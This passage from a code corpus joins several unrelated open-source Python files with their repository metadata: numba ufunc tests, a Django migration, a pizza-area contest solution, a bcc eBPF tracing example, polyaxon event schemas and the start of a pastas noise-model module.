        ufunc = gufb.build_ufunc()
        a = np.arange(10, dtype="complex64").reshape(2, 5) + 1j
        b = ufunc(a, a)
        self.assertTrue(np.all(a + a == b))
    def test_gufunc_struct_forceobj(self):
        # forceobj=True: the compile result must report object mode.
        gufb = GUFuncBuilder(guadd, "(x, y),(x, y)->(x, y)",
                             targetoptions=dict(forceobj=True))
        cres = gufb.add("void(complex64[:,:], complex64[:,:], complex64[:,"
                        ":])")
        self.assertTrue(cres.objectmode)
        ufunc = gufb.build_ufunc()
        a = np.arange(10, dtype="complex64").reshape(2, 5) + 1j
        b = ufunc(a, a)
        self.assertTrue(np.all(a + a == b))
        self.assertEqual(b.dtype, np.dtype('complex64'))
class TestGUfuncBuildingJitDisabled(TestGUfuncBuilding):
    """Re-run TestGUfuncBuilding with JIT compilation globally disabled.

    Fix: setUp previously assigned ``config.DISABLE_JIT = False`` — the
    default — duplicating the parent class instead of testing the
    JIT-disabled configuration its name promises.
    """

    def setUp(self):
        # Remember the previous setting so tearDown can restore it.
        self.old_disable_jit = config.DISABLE_JIT
        config.DISABLE_JIT = True

    def tearDown(self):
        config.DISABLE_JIT = self.old_disable_jit
class TestVectorizeDecor(TestCase):
    """Tests for the @vectorize and @guvectorize decorator APIs."""
    # Identity values accepted by both decorators.
    _supported_identities = [0, 1, None, "reorderable"]
    def test_vectorize(self):
        ufunc = vectorize(['int32(int32, int32)'])(add)
        a = np.arange(10, dtype='int32')
        b = ufunc(a, a)
        self.assertTrue(np.all(a + a == b))
        self.assertEqual(b.dtype, np.dtype('int32'))
    def test_vectorize_objmode(self):
        # forceobj=True must still produce a working, dtype-preserving ufunc.
        ufunc = vectorize(['int32(int32, int32)'], forceobj=True)(add)
        a = np.arange(10, dtype='int32')
        b = ufunc(a, a)
        self.assertTrue(np.all(a + a == b))
        self.assertEqual(b.dtype, np.dtype('int32'))
    @tag('important')
    def test_vectorize_bool_return(self):
        # Boolean-returning kernels must yield a bool_ array.
        ufunc = vectorize(['bool_(int32, int32)'])(equals)
        a = np.arange(10, dtype='int32')
        r = ufunc(a,a)
        self.assertTrue(np.all(r))
        self.assertEqual(r.dtype, np.dtype('bool_'))
    @tag('important')
    def test_vectorize_identity(self):
        # All supported identities map through; "reorderable" becomes None.
        sig = 'int32(int32, int32)'
        for identity in self._supported_identities:
            ufunc = vectorize([sig], identity=identity)(add)
            expected = None if identity == 'reorderable' else identity
            self.assertEqual(ufunc.identity, expected)
        # Default value is None
        ufunc = vectorize([sig])(add)
        self.assertIs(ufunc.identity, None)
        # Invalid values
        with self.assertRaises(ValueError):
            vectorize([sig], identity='none')(add)
        with self.assertRaises(ValueError):
            vectorize([sig], identity=2)(add)
    def test_vectorize_no_args(self):
        # Bare @vectorize (no signature list): types inferred lazily.
        a = np.linspace(0,1,10)
        b = np.linspace(1,2,10)
        ufunc = vectorize(add)
        self.assertTrue(np.all(ufunc(a,b) == (a + b)))
        ufunc2 = vectorize(add)
        c = np.empty(10)
        ufunc2(a, b, c)
        self.assertTrue(np.all(c == (a + b)))
    def test_vectorize_only_kws(self):
        # vectorize called with keyword arguments only.
        a = np.linspace(0,1,10)
        b = np.linspace(1,2,10)
        ufunc = vectorize(identity=PyUFunc_One, nopython=True)(mul)
        self.assertTrue(np.all(ufunc(a,b) == (a * b)))
    def test_vectorize_output_kwarg(self):
        """
        Passing the output array as a keyword argument (issue #1867).
        """
        def check(ufunc):
            a = np.arange(10, 16, dtype='int32')
            out = np.zeros_like(a)
            got = ufunc(a, a, out=out)
            self.assertIs(got, out)
            self.assertPreciseEqual(out, a + a)
            with self.assertRaises(TypeError):
                ufunc(a, a, zzz=out)
        # With explicit sigs
        ufunc = vectorize(['int32(int32, int32)'], nopython=True)(add)
        check(ufunc)
        # With implicit sig
        ufunc = vectorize(nopython=True)(add)
        check(ufunc)  # compiling
        check(ufunc)  # after compiling
    @tag('important')
    def test_guvectorize(self):
        ufunc = guvectorize(['(int32[:,:], int32[:,:], int32[:,:])'],
                            "(x,y),(x,y)->(x,y)")(guadd)
        a = np.arange(10, dtype='int32').reshape(2, 5)
        b = ufunc(a, a)
        self.assertTrue(np.all(a + a == b))
        self.assertEqual(b.dtype, np.dtype('int32'))
    @tag('important')
    def test_guvectorize_no_output(self):
        # All-input layout: caller supplies the output array explicitly.
        ufunc = guvectorize(['(int32[:,:], int32[:,:], int32[:,:])'],
                            "(x,y),(x,y),(x,y)")(guadd)
        a = np.arange(10, dtype='int32').reshape(2, 5)
        out = np.zeros_like(a)
        ufunc(a, a, out)
        self.assertTrue(np.all(a + a == out))
    def test_guvectorize_objectmode(self):
        # Kernel instantiates Dummy, forcing object-mode fallback.
        ufunc = guvectorize(['(int32[:,:], int32[:,:], int32[:,:])'],
                            "(x,y),(x,y)->(x,y)")(guadd_obj)
        a = np.arange(10, dtype='int32').reshape(2, 5)
        b = ufunc(a, a)
        self.assertTrue(np.all(a + a == b))
    def test_guvectorize_scalar_objectmode(self):
        """
        Test passing of scalars to object mode gufuncs.
        """
        ufunc = guvectorize(['(int32[:,:], int32, int32[:,:])'],
                            "(x,y),()->(x,y)")(guadd_scalar_obj)
        a = np.arange(10, dtype='int32').reshape(2, 5)
        b = ufunc(a, 3)
        self.assertTrue(np.all(a + 3 == b))
    def test_guvectorize_error_in_objectmode(self):
        # Exceptions raised in an object-mode kernel must propagate to the caller.
        ufunc = guvectorize(['(int32[:,:], int32[:,:], int32[:,:])'],
                            "(x,y),(x,y)->(x,y)", forceobj=True)(guerror)
        a = np.arange(10, dtype='int32').reshape(2, 5)
        with self.assertRaises(MyException):
            ufunc(a, a)
    @tag('important')
    def test_guvectorize_identity(self):
        # Same identity handling as @vectorize, for the gufunc decorator.
        args = (['(int32[:,:], int32[:,:], int32[:,:])'], "(x,y),(x,y)->(x,y)")
        for identity in self._supported_identities:
            ufunc = guvectorize(*args, identity=identity)(guadd)
            expected = None if identity == 'reorderable' else identity
            self.assertEqual(ufunc.identity, expected)
        # Default value is None
        ufunc = guvectorize(*args)(guadd)
        self.assertIs(ufunc.identity, None)
        # Invalid values
        with self.assertRaises(ValueError):
            guvectorize(*args, identity='none')(add)
        with self.assertRaises(ValueError):
            guvectorize(*args, identity=2)(add)
    def test_guvectorize_invalid_layout(self):
        sigs = ['(int32[:,:], int32[:,:], int32[:,:])']
        # Syntax error
        with self.assertRaises(ValueError) as raises:
            guvectorize(sigs, ")-:")(guadd)
        self.assertIn("bad token in signature", str(raises.exception))
        # Output shape can't be inferred from inputs
        with self.assertRaises(NameError) as raises:
            guvectorize(sigs, "(x,y),(x,y)->(x,z,v)")(guadd)
        self.assertEqual(str(raises.exception),
                         "undefined output symbols: v,z")
        # Arrow but no outputs
        with self.assertRaises(ValueError) as raises:
            guvectorize(sigs, "(x,y),(x,y),(x,y)->")(guadd)
        # (error message depends on Numpy version)
class TestVectorizeDecorJitDisabled(TestVectorizeDecor):
    """Re-run TestVectorizeDecor with JIT compilation globally disabled.

    Fix: setUp previously assigned ``config.DISABLE_JIT = False`` — the
    default — duplicating the parent class instead of testing the
    JIT-disabled configuration its name promises.
    """

    def setUp(self):
        # Remember the previous setting so tearDown can restore it.
        self.old_disable_jit = config.DISABLE_JIT
        config.DISABLE_JIT = True

    def tearDown(self):
        config.DISABLE_JIT = self.old_disable_jit
if __name__ == '__main__':
    # Allow running this test module directly.
    unittest.main()
| {
"content_hash": "755948017c721b3b862c1c2db03414f7",
"timestamp": "",
"source": "github",
"line_count": 382,
"max_line_length": 79,
"avg_line_length": 31.554973821989527,
"alnum_prop": 0.5578231292517006,
"repo_name": "stefanseefeld/numba",
"id": "48474a751cc2693bf019f01f819a4f306e44e9f4",
"size": "12054",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "numba/tests/npyufunc/test_ufuncbuilding.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Batchfile",
"bytes": "5535"
},
{
"name": "C",
"bytes": "303376"
},
{
"name": "C++",
"bytes": "17024"
},
{
"name": "Cuda",
"bytes": "214"
},
{
"name": "HTML",
"bytes": "98846"
},
{
"name": "Jupyter Notebook",
"bytes": "110325"
},
{
"name": "Python",
"bytes": "3946372"
},
{
"name": "Shell",
"bytes": "2414"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Adds Resume.timestamp (nullable text) and switches
    Resume.latest_timestamp to an auto-populated creation timestamp."""
    dependencies = [
        ('demo', '0001_initial'),
    ]
    operations = [
        migrations.AddField(
            model_name='resume',
            name='timestamp',
            field=models.TextField(null=True),
        ),
        migrations.AlterField(
            model_name='resume',
            name='latest_timestamp',
            field=models.DateTimeField(auto_now_add=True),
        ),
    ]
| {
"content_hash": "080531518db9e55067bcb7503beefa78",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 58,
"avg_line_length": 23.130434782608695,
"alnum_prop": 0.5657894736842105,
"repo_name": "largescale-dfss/concept-demo",
"id": "b7595e8455b2c2e6fa421217c201e52a808f2225",
"size": "556",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/dfss/demo/migrations/0002_auto_20151216_0033.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "73"
},
{
"name": "HTML",
"bytes": "4659"
},
{
"name": "Python",
"bytes": "16436"
}
],
"symlink_target": ""
} |
from sys import stdin
from math import pi
def readLine():
    """Read one line from stdin with surrounding whitespace stripped."""
    return stdin.readline().strip()
def readInt():
    """Read a single integer from the next stdin line."""
    return int(readLine())
def readInts():
    """Read a whitespace-separated list of integers from the next stdin line."""
    return list(map(int, readLine().split()))
def main():
    """Decide whether a whole pizza or a single slice gives more area per price."""
    # A: slice area, P1: slice price — presumed from usage; TODO confirm vs problem statement
    A, P1 = readInts()
    # R: whole-pizza radius, P2: whole-pizza price
    R, P2 = readInts()
    # Buy whichever option yields more area per unit price (slice wins ties).
    print('Whole pizza' if (A * 1.0 / P1) < ((pi * R * R) / P2) else 'Slice of pizza')
if __name__ == '__main__':
main() | {
"content_hash": "983a3a100bb73e9c54840cd4f93f77bf",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 86,
"avg_line_length": 19.63157894736842,
"alnum_prop": 0.5978552278820375,
"repo_name": "mikebsg01/Contests-Online",
"id": "3dea8a641dd4503e654ebcee9e4710e60f142256",
"size": "373",
"binary": false,
"copies": "3",
"ref": "refs/heads/main",
"path": "ACM-ICPC/Training/20190713/H.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "5687"
},
{
"name": "C++",
"bytes": "66615"
},
{
"name": "Java",
"bytes": "1738"
},
{
"name": "Python",
"bytes": "66"
},
{
"name": "Ruby",
"bytes": "852"
},
{
"name": "Shell",
"bytes": "71"
}
],
"symlink_target": ""
} |
from __future__ import print_function
from bcc import BPF
prog = """
int hello(void *ctx) {
bpf_trace_printk("Hello, World!\\n");
return 0;
}
"""
b = BPF(text=prog)
b.attach_kprobe(event=b.get_syscall_fnname("clone"), fn_name="hello")
print("PID MESSAGE")
try:
b.trace_print(fmt="{1} {5}")
except KeyboardInterrupt:
exit()
| {
"content_hash": "578b87d1107eef27557a9801837789c9",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 69,
"avg_line_length": 21,
"alnum_prop": 0.6547619047619048,
"repo_name": "brendangregg/bcc",
"id": "1c5beef2143f322966f7f9433b9e16769bc56cb6",
"size": "589",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "examples/tracing/trace_fields.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "8274020"
},
{
"name": "C++",
"bytes": "890599"
},
{
"name": "CMake",
"bytes": "48236"
},
{
"name": "HTML",
"bytes": "2997"
},
{
"name": "Lua",
"bytes": "299473"
},
{
"name": "Makefile",
"bytes": "3214"
},
{
"name": "Python",
"bytes": "1377079"
},
{
"name": "Shell",
"bytes": "21733"
}
],
"symlink_target": ""
} |
import json
from collections import namedtuple
from typing import Dict, Mapping, Optional, Union
from marshmallow import ValidationError, fields, pre_load, validate, validates_schema
import polyaxon_sdk
from polyaxon.parser import parser
from polyaxon.schemas.base import BaseConfig, BaseSchema
from polyaxon.utils.csv_utils import validate_csv
from polyaxon.utils.date_utils import parse_datetime
from polyaxon.utils.np_utils import sanitize_np_types
from polyaxon.utils.signal_decorators import check_partial
from polyaxon.utils.tz_utils import now
from traceml.artifacts.kinds import V1ArtifactKind
class EventImageSchema(BaseSchema):
    """Schema for image events: pixel dimensions, colorspace, and file path."""
    height = fields.Int(allow_none=True)
    width = fields.Int(allow_none=True)
    colorspace = fields.Int(allow_none=True)
    path = fields.Str(allow_none=True)
    @staticmethod
    def schema_config():
        return V1EventImage
class V1EventImage(BaseConfig, polyaxon_sdk.V1EventImage):
    """Image event payload; REDUCED_ATTRIBUTES are dropped from dumps when unset."""
    IDENTIFIER = V1ArtifactKind.IMAGE
    SCHEMA = EventImageSchema
    REDUCED_ATTRIBUTES = ["height", "width", "colorspace", "path"]
class EventVideoSchema(BaseSchema):
    """Schema for video events: dimensions, colorspace, file path, content type."""
    height = fields.Int(allow_none=True)
    width = fields.Int(allow_none=True)
    colorspace = fields.Int(allow_none=True)
    path = fields.Str(allow_none=True)
    content_type = fields.Str(allow_none=True)
    @staticmethod
    def schema_config():
        return V1EventVideo
class V1EventVideo(BaseConfig, polyaxon_sdk.V1EventVideo):
    """Video event payload; REDUCED_ATTRIBUTES are dropped from dumps when unset.

    Fix: SCHEMA previously pointed at EventImageSchema (copy-paste error),
    which silently dropped the ``content_type`` field during
    (de)serialization. EventVideoSchema is the matching schema — its
    ``schema_config`` already returns this class.
    """
    IDENTIFIER = V1ArtifactKind.VIDEO
    SCHEMA = EventVideoSchema
    REDUCED_ATTRIBUTES = ["height", "width", "colorspace", "path", "content_type"]
class EventDataframeSchema(BaseSchema):
    """Schema for dataframe events: file path and content type."""
    path = fields.Str(allow_none=True)
    content_type = fields.Str(allow_none=True)
    @staticmethod
    def schema_config():
        return V1EventDataframe
class V1EventDataframe(BaseConfig, polyaxon_sdk.V1EventDataframe):
    """Dataframe event payload; REDUCED_ATTRIBUTES are dropped from dumps when unset."""
    IDENTIFIER = V1ArtifactKind.DATAFRAME
    SCHEMA = EventDataframeSchema
    REDUCED_ATTRIBUTES = ["path", "content_type"]
class EventHistogramSchema(BaseSchema):
    """Schema for histogram events: bin values and per-bin counts."""
    values = fields.List(fields.Float(), allow_none=True)
    counts = fields.List(fields.Float(), allow_none=True)
    @staticmethod
    def schema_config():
        return V1EventHistogram
class V1EventHistogram(BaseConfig, polyaxon_sdk.V1EventHistogram):
    """Histogram event payload; REDUCED_ATTRIBUTES are dropped from dumps when unset."""
    IDENTIFIER = V1ArtifactKind.HISTOGRAM
    SCHEMA = EventHistogramSchema
    REDUCED_ATTRIBUTES = ["values", "counts"]
class EventAudioSchema(BaseSchema):
    """Schema for audio events: sample rate, channels, length, path, content type."""
    sample_rate = fields.Float(allow_none=True)
    num_channels = fields.Int(allow_none=True)
    length_frames = fields.Int(allow_none=True)
    path = fields.Str(allow_none=True)
    content_type = fields.Str(allow_none=True)
    @staticmethod
    def schema_config():
        return V1EventAudio
class V1EventAudio(BaseConfig, polyaxon_sdk.V1EventAudio):
    """Audio event payload; REDUCED_ATTRIBUTES are dropped from dumps when unset."""
    IDENTIFIER = V1ArtifactKind.AUDIO
    SCHEMA = EventAudioSchema
    REDUCED_ATTRIBUTES = [
        "sample_rate",
        "num_channels",
        "length_frames",
        "path",
        "content_type",
    ]
class V1EventChartKind(polyaxon_sdk.V1EventChartKind):
    """Local alias for the SDK's chart-kind enumeration."""
    pass
class EventChartSchema(BaseSchema):
    """Schema for chart events: chart kind plus the raw figure dict."""
    kind = fields.Str(
        allow_none=True, validate=validate.OneOf(V1EventChartKind.allowable_values)
    )
    figure = fields.Dict(allow_none=True)
    @staticmethod
    def schema_config():
        return V1EventChart
class V1EventChart(BaseConfig, polyaxon_sdk.V1EventChart):
    """Chart event payload; plotly figures get special JSON handling on dump."""
    IDENTIFIER = V1ArtifactKind.CHART
    SCHEMA = EventChartSchema
    REDUCED_ATTRIBUTES = ["kind", "figure"]
    def to_dict(self, humanize_values=False, unknown=None, dump=False):
        # Plotly figures may contain numpy arrays/dates, so they must be
        # serialized with plotly's JSON encoder; note this branch returns a
        # JSON *string* regardless of `dump`.
        if self.kind == V1EventChartKind.PLOTLY:
            import plotly.tools
            # NOTE(review): relies on `import plotly.tools` making
            # `plotly.utils` available as a side effect — confirm; an explicit
            # `import plotly.utils` would be more robust.
            obj = self.obj_to_dict(
                self, humanize_values=humanize_values, unknown=unknown
            )
            return json.dumps(obj, cls=plotly.utils.PlotlyJSONEncoder)
        # Resume normal serialization
        return super().to_dict(humanize_values, unknown, dump)
class V1EventCurveKind(polyaxon_sdk.V1EventCurveKind):
    """Local alias for the SDK's curve-kind enumeration."""
    pass
class EventCurveSchema(BaseSchema):
    """Schema for curve events (e.g. ROC/PR): kind, x/y series, annotation."""
    kind = fields.Str(
        allow_none=True, validate=validate.OneOf(V1EventCurveKind.allowable_values)
    )
    x = fields.List(fields.Float(), allow_none=True)
    y = fields.List(fields.Float(), allow_none=True)
    annotation = fields.Str(allow_none=True)
    @staticmethod
    def schema_config():
        return V1EventCurve
class V1EventCurve(BaseConfig, polyaxon_sdk.V1EventCurve):
    """Curve event payload; REDUCED_ATTRIBUTES are dropped from dumps when unset."""
    IDENTIFIER = V1ArtifactKind.CURVE
    SCHEMA = EventCurveSchema
    REDUCED_ATTRIBUTES = ["kind", "x", "y", "annotation"]
class EventConfusionMatrixSchema(BaseSchema):
    """Schema for confusion-matrix events: axis labels x/y and cell values z."""
    x = fields.List(fields.Raw(), allow_none=True)
    y = fields.List(fields.Raw(), allow_none=True)
    z = fields.List(fields.Raw(), allow_none=True)
    @staticmethod
    def schema_config():
        return V1EventConfusionMatrix
class V1EventConfusionMatrix(BaseConfig, polyaxon_sdk.V1EventConfusionMatrix):
    """Confusion-matrix event payload; REDUCED_ATTRIBUTES dropped when unset."""
    IDENTIFIER = V1ArtifactKind.CONFUSION
    SCHEMA = EventConfusionMatrixSchema
    REDUCED_ATTRIBUTES = ["x", "y", "z"]
class EventArtifactSchema(BaseSchema):
    """Schema for generic artifact events: artifact kind and file path."""
    kind = fields.Str(
        allow_none=True, validate=validate.OneOf(V1ArtifactKind.allowable_values)
    )
    path = fields.Str(allow_none=True)
    @staticmethod
    def schema_config():
        return V1EventArtifact
class V1EventArtifact(BaseConfig, polyaxon_sdk.V1EventArtifact):
    """Generic artifact event payload; identified by the plain "artifact" key."""
    IDENTIFIER = "artifact"
    SCHEMA = EventArtifactSchema
    REDUCED_ATTRIBUTES = ["kind", "path"]
class EventModelSchema(BaseSchema):
    """Schema for model events: framework name, file path, and free-form spec."""
    framework = fields.Str(allow_none=True)
    path = fields.Str(allow_none=True)
    spec = fields.Raw(allow_none=True)
    @staticmethod
    def schema_config():
        return V1EventModel
class V1EventModel(BaseConfig, polyaxon_sdk.V1EventModel):
    """Model event payload; REDUCED_ATTRIBUTES are dropped from dumps when unset."""
    IDENTIFIER = V1ArtifactKind.MODEL
    SCHEMA = EventModelSchema
    REDUCED_ATTRIBUTES = ["framework", "path", "spec"]
class EventSchema(BaseSchema):
    """Schema for a single logged event.

    An event carries a timestamp, an optional step, and exactly one payload
    ("primitive") among the supported artifact kinds below.

    Refactor: the previous implementation copy-pasted one coercion branch per
    key in ``pre_validate`` and one counting branch per key in
    ``validate_event``; both are now data-driven over explicit key tuples,
    with identical keys and the same exception type and message format (the
    reported count is now the true total when more than two primitives are set).
    """

    timestamp = fields.DateTime(allow_none=True)
    step = fields.Int(allow_none=True)
    metric = fields.Float(allow_none=True)
    image = fields.Nested(EventImageSchema, allow_none=True)
    histogram = fields.Nested(EventHistogramSchema, allow_none=True)
    audio = fields.Nested(EventAudioSchema, allow_none=True)
    video = fields.Nested(EventVideoSchema, allow_none=True)
    html = fields.Str(allow_none=True)
    text = fields.Str(allow_none=True)
    chart = fields.Nested(EventChartSchema, allow_none=True)
    curve = fields.Nested(EventCurveSchema, allow_none=True)
    confusion = fields.Nested(EventConfusionMatrixSchema, allow_none=True)
    artifact = fields.Nested(EventArtifactSchema, allow_none=True)
    model = fields.Nested(EventModelSchema, allow_none=True)
    dataframe = fields.Nested(EventDataframeSchema, allow_none=True)

    @staticmethod
    def schema_config():
        return V1Event

    @pre_load
    def pre_validate(self, data, **kwargs):
        """Coerce nested payloads that may arrive as strings into dicts."""
        # Keys with nested-dict payloads; `metric`, `html` and `text` are
        # scalars and need no coercion. "artifact" is a plain key mirroring
        # the field name above, not a V1ArtifactKind constant.
        dict_keys = (
            V1ArtifactKind.IMAGE,
            V1ArtifactKind.HISTOGRAM,
            V1ArtifactKind.AUDIO,
            V1ArtifactKind.VIDEO,
            V1ArtifactKind.CHART,
            V1ArtifactKind.CURVE,
            V1ArtifactKind.CONFUSION,
            "artifact",
            V1ArtifactKind.MODEL,
            V1ArtifactKind.DATAFRAME,
        )
        for key in dict_keys:
            if data.get(key) is not None:
                data[key] = parser.get_dict(key=key, value=data[key])
        return data

    @validates_schema
    @check_partial
    def validate_event(self, values, **kwargs):
        """Ensure exactly one primitive payload is set on the event."""
        primitive_keys = (
            V1ArtifactKind.METRIC,
            V1ArtifactKind.IMAGE,
            V1ArtifactKind.HISTOGRAM,
            V1ArtifactKind.AUDIO,
            V1ArtifactKind.VIDEO,
            V1ArtifactKind.HTML,
            V1ArtifactKind.TEXT,
            V1ArtifactKind.CHART,
            V1ArtifactKind.CURVE,
            V1ArtifactKind.CONFUSION,
            "artifact",
            V1ArtifactKind.MODEL,
            V1ArtifactKind.DATAFRAME,
        )
        count = sum(1 for key in primitive_keys if values.get(key) is not None)
        if count != 1:
            raise ValidationError(
                "An event should have one and only one primitive, found {}.".format(
                    count
                )
            )
class V1Event(BaseConfig, polyaxon_sdk.V1Event):
    """A single logged event carrying exactly one primitive value.

    The primitive can be a metric, a media object (image/audio/video/...),
    raw html/text, a chart/curve/confusion matrix, or an artifact/model/
    dataframe reference. ``EventSchema`` enforces the one-primitive rule.
    """

    SEPARATOR = "|"
    IDENTIFIER = "event"
    SCHEMA = EventSchema
    REDUCED_ATTRIBUTES = [
        "metric",
        "image",
        "histogram",
        "audio",
        "video",
        "html",
        "text",
        "chart",
        "curve",
        "confusion",
        "artifact",
        "model",
        "dataframe",
    ]

    @classmethod
    def make(
        cls,
        step: int = None,
        timestamp=None,
        metric: float = None,
        image: V1EventImage = None,
        histogram: V1EventHistogram = None,
        audio: V1EventAudio = None,
        video: V1EventVideo = None,
        html: str = None,
        text: str = None,
        chart: V1EventChart = None,
        curve: V1EventCurve = None,
        confusion: V1EventConfusionMatrix = None,
        artifact: V1EventArtifact = None,
        model: V1EventModel = None,
        dataframe: V1EventDataframe = None,
    ) -> "V1Event":
        """Build an event, parsing string timestamps and defaulting to now.

        Raises
        ------
        ValidationError
            If ``timestamp`` is a string that cannot be parsed.
        """
        if isinstance(timestamp, str):
            try:
                timestamp = parse_datetime(timestamp)
            except Exception as e:
                raise ValidationError("Received an invalid timestamp") from e
        if not timestamp:
            # No (or falsy) timestamp given: stamp with the current tz-aware time.
            timestamp = now(tzinfo=True)
        return cls(
            timestamp=timestamp,
            step=step,
            metric=metric,
            image=image,
            histogram=histogram,
            audio=audio,
            video=video,
            html=html,
            text=text,
            chart=chart,
            curve=curve,
            confusion=confusion,
            artifact=artifact,
            model=model,
            dataframe=dataframe,
        )

    def get_value(self, dump=True):
        """Return whichever primitive is set on this event.

        Dict-like primitives are serialized via ``to_dict`` when ``dump`` is
        True; ``html``/``text`` come back as raw strings and ``metric`` as a
        ``str``. Returns None when no primitive is set.
        """
        if self.metric is not None:
            return str(self.metric) if dump else self.metric
        # Checked in the same order the original attribute chain used.
        for attr in (
            "image",
            "histogram",
            "audio",
            "video",
            "html",
            "text",
            "chart",
            "curve",
            "confusion",
            "artifact",
            "model",
            "dataframe",
        ):
            value = getattr(self, attr)
            if value is None:
                continue
            if attr in ("html", "text"):
                # Plain strings: returned as-is regardless of dump.
                return value
            return value.to_dict(dump=dump) if dump else value

    def to_csv(self) -> str:
        """Serialize step, timestamp and value as one separator-joined row."""
        step = str(self.step) if self.step is not None else ""
        stamp = str(self.timestamp) if self.timestamp is not None else ""
        return self.SEPARATOR.join([step, stamp, self.get_value(dump=True)])
class V1Events:
    """Tabular (pandas) view over many logged events of one kind/name."""

    ORIENT_CSV = "csv"
    ORIENT_DICT = "dict"

    def __init__(self, kind, name, df):
        self.kind = kind
        self.name = name
        self.df = df

    @classmethod
    def read(
        cls, kind: str, name: str, data: Union[str, Dict], parse_dates: bool = True
    ) -> "V1Events":
        """Load events from a CSV string or a dict of columns.

        Raises
        ------
        ValueError
            If ``data`` is neither a str nor a dict.
        """
        import pandas as pd

        if isinstance(data, str):
            # CSV payload: timestamps are parsed unless explicitly disabled.
            read_kwargs = {"sep": V1Event.SEPARATOR}
            if parse_dates:
                read_kwargs["parse_dates"] = ["timestamp"]
            frame = pd.read_csv(validate_csv(data), **read_kwargs)
        elif isinstance(data, dict):
            frame = pd.DataFrame.from_dict(data)
        else:
            raise ValueError(
                "V1Events received an unsupported value type: {}".format(type(data))
            )
        return cls(name=name, kind=kind, df=frame)

    def to_dict(self, orient: str = "list") -> Dict:
        """Return the frame as a dict with NaN normalized to None."""
        import numpy as np

        cleaned = self.df.replace({np.nan: None})
        return cleaned.to_dict(orient=orient)

    def get_event_at(self, index):
        """Rebuild a single V1Event from the row at ``index``."""
        row = self.df.iloc[index].to_dict()
        row["timestamp"] = row["timestamp"].isoformat()
        row["step"] = sanitize_np_types(row["step"])
        return V1Event.from_dict(row)

    def _get_step_summary(self) -> Optional[Dict]:
        # None when there are no step values at all.
        steps = self.df.step
        if steps.count() == 0:
            return None
        return {
            "count": sanitize_np_types(steps.count()),
            "min": sanitize_np_types(steps.iloc[0]),
            "max": sanitize_np_types(steps.iloc[-1]),
        }

    def _get_ts_summary(self) -> Optional[Dict]:
        # None when there are no timestamps at all.
        stamps = self.df.timestamp
        if stamps.count() == 0:
            return None
        return {
            "min": stamps.iloc[0].isoformat(),
            "max": stamps.iloc[-1].isoformat(),
        }

    def get_summary(self) -> Dict:
        """Summarize steps, timestamps, and (for metrics) value statistics."""
        summary = {"is_event": True}
        step_summary = self._get_step_summary()
        if step_summary:
            summary["step"] = step_summary
        ts_summary = self._get_ts_summary()
        if ts_summary:
            summary["timestamp"] = ts_summary
        if self.kind == V1ArtifactKind.METRIC:
            stats = {
                k: sanitize_np_types(v)
                for k, v in self.df.metric.describe().to_dict().items()
            }
            stats["last"] = sanitize_np_types(self.df.metric.iloc[-1])
            summary[self.kind] = stats
        return summary
class LoggedEventSpec(namedtuple("LoggedEventSpec", "name kind event")):
    # Lightweight value type pairing a single event with its name and kind.
    pass
class LoggedEventListSpec(namedtuple("LoggedEventListSpec", "name kind events")):
    """A named batch of events of one kind, serializable to CSV or dict."""

    def get_csv_header(self) -> str:
        """Header row matching the per-event CSV layout."""
        return V1Event.SEPARATOR.join(["step", "timestamp", self.kind])

    def get_csv_events(self) -> str:
        """All events as newline-prefixed CSV rows (appendable to a file)."""
        return "".join("\n{}".format(event.to_csv()) for event in self.events)

    def empty_events(self):
        # Clear in place so external references to the list observe the reset.
        del self.events[:]

    def to_dict(self):
        return {
            "name": self.name,
            "kind": self.kind,
            "events": [event.to_dict() for event in self.events],
        }

    @classmethod
    def from_dict(cls, value: Mapping) -> "LoggedEventListSpec":
        parsed = [V1Event.from_dict(item) for item in value.get("events", [])]
        return cls(name=value.get("name"), kind=value.get("kind"), events=parsed)
| {
"content_hash": "f00de3c47735af6f1d36d69924a36788",
"timestamp": "",
"source": "github",
"line_count": 557,
"max_line_length": 88,
"avg_line_length": 32.156193895870736,
"alnum_prop": 0.6129752665959466,
"repo_name": "polyaxon/polyaxon",
"id": "b102f5491c7d90b8808d0b8510a444f52564057d",
"size": "18515",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "traceml/traceml/events/schemas.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "1989"
},
{
"name": "Python",
"bytes": "5201898"
},
{
"name": "Shell",
"bytes": "1565"
}
],
"symlink_target": ""
} |
"""This module contains the noise models available in Pastas.
A Noise model may be used to transform the residual series into a noise
series that better represents white noise.
Examples
--------
By default, a noise model is added to a Pastas model. It is possible to
replace the default model with different models as follows:
>>> n = ps.ArmaModel()
>>> ml.add_noisemodel(n)
or, to delete the noise model from the model:
>>> ml.del_noisemodel()
See Also
--------
pastas.model.Model.add_noisemodel
"""
import numpy as np
from pandas import DataFrame, Series, Timedelta
from .decorators import njit, set_parameter
from .utils import check_numba
__all__ = ["NoiseModel", "ArmaModel"]
class NoiseModelBase:
    """Base class handling parameter bookkeeping for Pastas noise models."""

    _name = "NoiseModelBase"

    def __init__(self):
        self.nparam = 1
        self.name = "noise"
        # One row per parameter: initial value, bounds, vary flag, owner name.
        self.parameters = DataFrame(
            columns=["initial", "pmin", "pmax", "vary", "name"])

    def set_init_parameters(self, oseries=None):
        """Initialize noise_alpha from the median observation spacing (days)."""
        if oseries is None:
            pinit = 14.0
        else:
            spacing = np.diff(oseries.index.to_numpy()) / Timedelta("1D")
            pinit = np.median(spacing)
        self.parameters.loc["noise_alpha"] = (pinit, 1e-5, 5000, True, "noise")

    @set_parameter
    def _set_initial(self, name, value):
        """Set the initial value of a noise parameter.

        Notes
        -----
        Prefer setting parameters through the model instead.
        """
        self.parameters.loc[name, "initial"] = value

    @set_parameter
    def _set_pmin(self, name, value):
        """Set the lower bound of a noise parameter.

        Notes
